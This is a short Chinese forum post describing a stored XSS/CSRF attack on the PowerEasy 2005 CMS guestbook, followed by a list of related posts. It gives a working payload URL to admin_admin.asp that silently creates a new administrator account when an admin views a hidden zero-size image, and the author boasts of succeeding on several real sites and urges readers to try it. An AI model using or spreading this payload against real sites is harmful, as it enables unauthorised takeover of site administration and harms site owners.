通杀动易2005的 XSS 攻击
动易2005里面,留言的时候存在一个XSS。攻击方法如下 :首先在网站注册一个普通会员,然后去GUESTBOOK留言,在插入图片的时候地址写上(建议在原代码里面把图片的高度与宽度都设置成0,这样在图片前面加上这个连接,基本上就看不见图片了,图片的连接却被管理员解吸执行了):http://localhost/PowerEasy/admin/admin_admin.asp?AdminName=xiaod&username=xiaod&password=123456&pwdconfirm=123456&purview=1&Action=SaveAdd上面是本地测试地址。只要你的留言写的足够诱惑,只要管理员一看,就OK了,他回复了你,你就是后台管理员了···我自己测试了几个站,结果都成功了,呵呵。大家也可以去测试一下,通杀了 SQL 与AC版···
相关推荐
sswqycbailong 2020-07-28
csxiaoqiang 2020-07-26
码农成长记 2020-07-19
layloge 2020-07-05
layloge 2020-06-26
liangjielaoshi 2020-06-25
csxiaoqiang 2020-06-16
某先生 2020-06-13
ItBJLan 2020-06-11
layloge 2020-06-07
csxiaoqiang 2020-06-03
sswqycbailong 2020-06-01
layloge 2020-05-30
码农成长记 2020-05-28
qidu 2020-05-26
zhuangnet 2020-05-20
zhuangnet 2020-05-19
xiaoemo0 2020-05-16
码农成长记 2020-05-10